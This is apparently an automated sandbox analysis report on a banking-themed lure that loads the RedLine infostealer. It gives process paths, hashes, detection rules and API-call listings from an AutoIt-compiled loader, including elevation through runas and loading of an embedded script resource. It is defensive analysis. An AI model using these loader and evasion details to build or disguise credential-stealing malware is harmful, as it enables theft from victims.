Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.1486418778.0000000004060000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:45:16
Start date:	25/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\cyclop\directiveness.exe"
Imagebase:	0xfd0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:45:40
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:	0xd10000
File size:	665'670'656 bytes
MD5 hash:	BFC26CE0E7B874E618CC8D0CF3657608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	9.4%
Total number of Nodes:	1992
Total number of Limit Nodes:	164

Executed Functions

Function 000CB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d192dd86a295e7662f6b3f86a614ba9e8d4bd7fc99d21c9a5c0d7048c9dcb44
Instruction ID: 7ce39669c432f0c545c0d97cfc5be0cfab8ea21813e8f0832056e4311855d879
Opcode Fuzzy Hash: 5d192dd86a295e7662f6b3f86a614ba9e8d4bd7fc99d21c9a5c0d7048c9dcb44
Instruction Fuzzy Hash: 25324D75A022688FDB258F54DC82BEDB7F5FB46310F1841D9E80AA7A91D7309E81CF52

Function 000A3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,000A3AA3,?), ref: 000A3D45
IsDebuggerPresent.KERNEL32(?,?,?,?,000A3AA3,?), ref: 000A3D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00161148,00161130,?,?,?,?,000A3AA3,?), ref: 000A3DC8

Part of subcall function 000A6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000A3DEE,00161148,?,?,?,?,?,000A3AA3,?), ref: 000A6471

SetCurrentDirectoryW.KERNEL32(?,?,?,000A3AA3,?), ref: 000A3E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001528F4,00000010), ref: 00111CCE
SetCurrentDirectoryW.KERNEL32(?,00161148,?,?,?,?,?,000A3AA3,?), ref: 00111D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0013DAB4,00161148,?,?,?,?,?,000A3AA3,?), ref: 00111D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,000A3AA3), ref: 00111D90

Part of subcall function 000A3E6E: GetSysColorBrush.USER32(0000000F), ref: 000A3E79
Part of subcall function 000A3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 000A3E88
Part of subcall function 000A3E6E: LoadIconW.USER32(00000063), ref: 000A3E9E
Part of subcall function 000A3E6E: LoadIconW.USER32(000000A4), ref: 000A3EB0
Part of subcall function 000A3E6E: LoadIconW.USER32(000000A2), ref: 000A3EC2
Part of subcall function 000A3E6E: RegisterClassExW.USER32(?), ref: 000A3F30

Part of subcall function 000A36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000A36E6
Part of subcall function 000A36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000A3707
Part of subcall function 000A36B8: ShowWindow.USER32(00000000,?,?,?,?,000A3AA3,?), ref: 000A371B
Part of subcall function 000A36B8: ShowWindow.USER32(00000000,?,?,?,?,000A3AA3,?), ref: 000A3724

Part of subcall function 000A4FFC: _memset.LIBCMT ref: 000A5022
Part of subcall function 000A4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000A50CB

Strings

runas, xrefs: 00111D84
This is a third-party compiled AutoIt script., xrefs: 00111CC8

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: e610cc9f51facf104d60fef4b5a352870044f8d9af93bca3f232d529f871ad86
Instruction ID: 8b333ef489729ce51ae73762a417330648d35e9f942b6a8ca79f10379c9f74be
Opcode Fuzzy Hash: e610cc9f51facf104d60fef4b5a352870044f8d9af93bca3f232d529f871ad86
Instruction Fuzzy Hash: 6D512631A04248BACF11EBF0EC46EEE7B75AF17704F084065F611A6193DBB54A8ACB21

Function 000BDDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 000BDDEC
GetCurrentProcess.KERNEL32(00000000,0013DC38,?,?), ref: 000BDEAC
GetNativeSystemInfo.KERNELBASE(?,0013DC38,?,?), ref: 000BDF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 000BDF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 000BDF1F
GetSystemInfo.KERNEL32(?,0013DC38,?,?), ref: 000BDF29
GetSystemInfo.KERNEL32(?,0013DC38,?,?), ref: 000BDF35

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 4fb2b2bb1f14a26466ca23dcc0f21a54bfff00be4de528bf683e5ad23dfecd8a
Instruction ID: 2ce68e7edd5452ec9068773c34166fc2dba6051b99dbeaf61972cd24f3004805
Opcode Fuzzy Hash: 4fb2b2bb1f14a26466ca23dcc0f21a54bfff00be4de528bf683e5ad23dfecd8a
Instruction Fuzzy Hash: 6461A1B180A384DFCF25DF6898C11EDBFB4AF29300B1989EAD8459F207D634C959CB65

Function 000A406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000A449E,?,?,00000000,00000001), ref: 000A407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000A449E,?,?,00000000,00000001), ref: 000A4092
LoadResource.KERNEL32(?,00000000,?,?,000A449E,?,?,00000000,00000001,?,?,?,?,?,?,000A41FB), ref: 00114F1A
SizeofResource.KERNEL32(?,00000000,?,?,000A449E,?,?,00000000,00000001,?,?,?,?,?,?,000A41FB), ref: 00114F2F
LockResource.KERNEL32(000A449E,?,?,000A449E,?,?,00000000,00000001,?,?,?,?,?,?,000A41FB,00000000), ref: 00114F42

Strings

SCRIPT, xrefs: 000A4088

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 4f8eaeb44dc48ad1a32dd45109ad2bbb8c8d0cdefa6467d3baa5c8860a82f0de
Instruction ID: 75a0ae6443f7027ef9f351ff0ca0925f17f995c8311b92a77e6f3c819826ddf6
Opcode Fuzzy Hash: 4f8eaeb44dc48ad1a32dd45109ad2bbb8c8d0cdefa6467d3baa5c8860a82f0de
Instruction Fuzzy Hash: D4113C75200701BFE7318B65EC48F677BB9EBC6B51F20417CF602966A0DBB1DC419A60

Function 000E6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00112F49), ref: 000E6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 000E6CCA
FindClose.KERNEL32(00000000), ref: 000E6CDA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: b05a453c6f160312bad323c354ab9d988244808ad7337d5d58bc32c9e6ea3de9
Instruction ID: d47dab82c4e8d2a134ce70b377aa0980f680164769ab9d853bf38c16fc1af4f1
Opcode Fuzzy Hash: b05a453c6f160312bad323c354ab9d988244808ad7337d5d58bc32c9e6ea3de9
Instruction Fuzzy Hash: A4E0D8318105106F82306738FC0D4F937ACEB25379F200755F471D15D0E771D96045D6

Function 000B3200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 3b102dd883dc222fa5d2252e42334cb16854f2b1bf6ca4efe6f076c46b21801b
Instruction ID: 869fbb7595d150fa895e6c56e26bac079069b57893198e833b0e0f90ef9f62ac
Opcode Fuzzy Hash: 3b102dd883dc222fa5d2252e42334cb16854f2b1bf6ca4efe6f076c46b21801b
Instruction Fuzzy Hash: C3925A70608341DFD724DF18C494BAABBE1BF89304F24886DE99A8B352D771ED85CB52

Function 000AE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000AE959
timeGetTime.WINMM ref: 000AEBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000AED2E
TranslateMessage.USER32(?), ref: 000AED3F
DispatchMessageW.USER32(?), ref: 000AED4A
LockWindowUpdate.USER32(00000000), ref: 000AED79
DestroyWindow.USER32 ref: 000AED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000AED9F
Sleep.KERNEL32(0000000A), ref: 00115270
TranslateMessage.USER32(?), ref: 001159F7
DispatchMessageW.USER32(?), ref: 00115A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00115A19

Strings

@GUI_CTRLID, xrefs: 00115314
@GUI_CTRLHANDLE, xrefs: 001153AC
@GUI_WINHANDLE, xrefs: 00115360
@TRAY_ID, xrefs: 001154C9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 2f8e0444c33bbcf08e8f643138093e2885f387b92263d2db7d9cb762bd2e3cdc
Instruction ID: 3a120f61d0be24c6fef305576cea8ded4c1b4a23cb77cd7e6cbecbb16951ece3
Opcode Fuzzy Hash: 2f8e0444c33bbcf08e8f643138093e2885f387b92263d2db7d9cb762bd2e3cdc
Instruction Fuzzy Hash: 4762B270508380DFEB24DF64C885BEA77E5BF95304F18497DF9468B292DBB19884CB62

Function 000D5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 000D5EC3
___createFile.LIBCMT ref: 000D5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000D5F2D
__dosmaperr.LIBCMT ref: 000D5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 000D5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000D5F6A
__dosmaperr.LIBCMT ref: 000D5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000D5F7C
__set_osfhnd.LIBCMT ref: 000D5FAC
__lseeki64_nolock.LIBCMT ref: 000D6016
__close_nolock.LIBCMT ref: 000D603C
__chsize_nolock.LIBCMT ref: 000D606C
__lseeki64_nolock.LIBCMT ref: 000D607E
__lseeki64_nolock.LIBCMT ref: 000D6176
__lseeki64_nolock.LIBCMT ref: 000D618B
__close_nolock.LIBCMT ref: 000D61EB

Part of subcall function 000CEA9C: CloseHandle.KERNELBASE(00000000,0014EEF4,00000000,?,000D6041,0014EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000CEAEC
Part of subcall function 000CEA9C: GetLastError.KERNEL32(?,000D6041,0014EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000CEAF6
Part of subcall function 000CEA9C: __free_osfhnd.LIBCMT ref: 000CEB03
Part of subcall function 000CEA9C: __dosmaperr.LIBCMT ref: 000CEB25

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

__lseeki64_nolock.LIBCMT ref: 000D620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000D6342
___createFile.LIBCMT ref: 000D6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000D636E
__dosmaperr.LIBCMT ref: 000D6375
__free_osfhnd.LIBCMT ref: 000D6395
__invoke_watson.LIBCMT ref: 000D63C3
__wsopen_helper.LIBCMT ref: 000D63DD

Strings

@, xrefs: 000D5F98

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: a70430beb49bc75720bcaf4dc575963ccda69b78e700e43e5ee382a5edd41bc7
Instruction ID: 5882b55bd3c88154f0a189f626a74207e4c1069691e4659b8c9b5790745bbbf3
Opcode Fuzzy Hash: a70430beb49bc75720bcaf4dc575963ccda69b78e700e43e5ee382a5edd41bc7
Instruction Fuzzy Hash: 272217719007069BEB299F68CC45BFD7BB2EB14325F24422AE9159B3D2C7368D40CB71

Function 000EFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 000EFA96
_wcschr.LIBCMT ref: 000EFAA4
_wcscpy.LIBCMT ref: 000EFABB
_wcscat.LIBCMT ref: 000EFACA
_wcscat.LIBCMT ref: 000EFAE8
_wcscpy.LIBCMT ref: 000EFB09
__wsplitpath.LIBCMT ref: 000EFBE6
_wcscpy.LIBCMT ref: 000EFC0B
_wcscpy.LIBCMT ref: 000EFC1D
_wcscpy.LIBCMT ref: 000EFC32
_wcscat.LIBCMT ref: 000EFC47
_wcscat.LIBCMT ref: 000EFC59
_wcscat.LIBCMT ref: 000EFC6E

Part of subcall function 000EBFA4: _wcscmp.LIBCMT ref: 000EC03E
Part of subcall function 000EBFA4: __wsplitpath.LIBCMT ref: 000EC083
Part of subcall function 000EBFA4: _wcscpy.LIBCMT ref: 000EC096
Part of subcall function 000EBFA4: _wcscat.LIBCMT ref: 000EC0A9
Part of subcall function 000EBFA4: __wsplitpath.LIBCMT ref: 000EC0CE
Part of subcall function 000EBFA4: _wcscat.LIBCMT ref: 000EC0E4
Part of subcall function 000EBFA4: _wcscat.LIBCMT ref: 000EC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 000EFA61

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 81c54d4f7be3b907a442d6eebab878f7d729d9b1083502c1f7c0751f762501bd
Instruction ID: a8104011508aaf2a3a9e0d89658ad9ac861b8c71b489fdd503397ea394add320
Opcode Fuzzy Hash: 81c54d4f7be3b907a442d6eebab878f7d729d9b1083502c1f7c0751f762501bd
Instruction Fuzzy Hash: 2391A172504645AFCB20EB91C851FEFB3E9BF94300F04486DF95997292DB35EA44CB92

Function 000A3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000A3F86
RegisterClassExW.USER32(00000030), ref: 000A3FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000A3FC1
InitCommonControlsEx.COMCTL32(?), ref: 000A3FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000A3FEE
LoadIconW.USER32(000000A9), ref: 000A4004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000A4013

Strings

0, xrefs: 000A3F68
+, xrefs: 000A3F6F
AutoIt v3 GUI, xrefs: 000A3FA2
TaskbarCreated, xrefs: 000A3FB6

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: b41f3e472f08b9665b20d4e7cd7435c52201c84fb0c1510550caa270e527d786
Instruction ID: 00b1a2957ecaea49a621b7710479749cf9c1fde9337d5e58268aa53314f09404
Opcode Fuzzy Hash: b41f3e472f08b9665b20d4e7cd7435c52201c84fb0c1510550caa270e527d786
Instruction Fuzzy Hash: 9521E0B9D00208BFDB10DFA4EC89BCDBBB4FB08700F04421AFA21A66A0D7F445958F95

Function 000EBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000EBDB4: __time64.LIBCMT ref: 000EBDBE

Part of subcall function 000A4517: _fseek.LIBCMT ref: 000A452F

__wsplitpath.LIBCMT ref: 000EC083

Part of subcall function 000C1DFC: __wsplitpath_helper.LIBCMT ref: 000C1E3C

_wcscpy.LIBCMT ref: 000EC096
_wcscat.LIBCMT ref: 000EC0A9
__wsplitpath.LIBCMT ref: 000EC0CE
_wcscat.LIBCMT ref: 000EC0E4
_wcscat.LIBCMT ref: 000EC0F7
_wcscmp.LIBCMT ref: 000EC03E

Part of subcall function 000EC56D: _wcscmp.LIBCMT ref: 000EC65D
Part of subcall function 000EC56D: _wcscmp.LIBCMT ref: 000EC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000EC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000EC338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000EC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000EC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000EC371

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 53fe111d26e77041fc2577d16502266439aa028256ea90d676936bc3b8c3ee3c
Instruction ID: 2106b41ca397c7ef1395277db42abbec6185fa2d8727e44929013c0693d564dc
Opcode Fuzzy Hash: 53fe111d26e77041fc2577d16502266439aa028256ea90d676936bc3b8c3ee3c
Instruction Fuzzy Hash: 2FC10BB1900259AFDF21DFA5CC81EDEB7BDAF49310F0040AAF609F6152DB719A858F61

Function 000A3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 000A37B3
KillTimer.USER32(?,00000001), ref: 000A37DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000A3800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000A380B
CreatePopupMenu.USER32 ref: 000A381F
PostQuitMessage.USER32(00000000), ref: 000A382E

Strings

TaskbarCreated, xrefs: 000A3806

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d445c1a9307aaa17640d51cd2d5152c6237f7704a838a23bee743f6250ce488f
Instruction ID: 1f2681d724f3dc25e0da855be461e42b6d646badb3c4166adb2894bddb3e54a4
Opcode Fuzzy Hash: d445c1a9307aaa17640d51cd2d5152c6237f7704a838a23bee743f6250ce488f
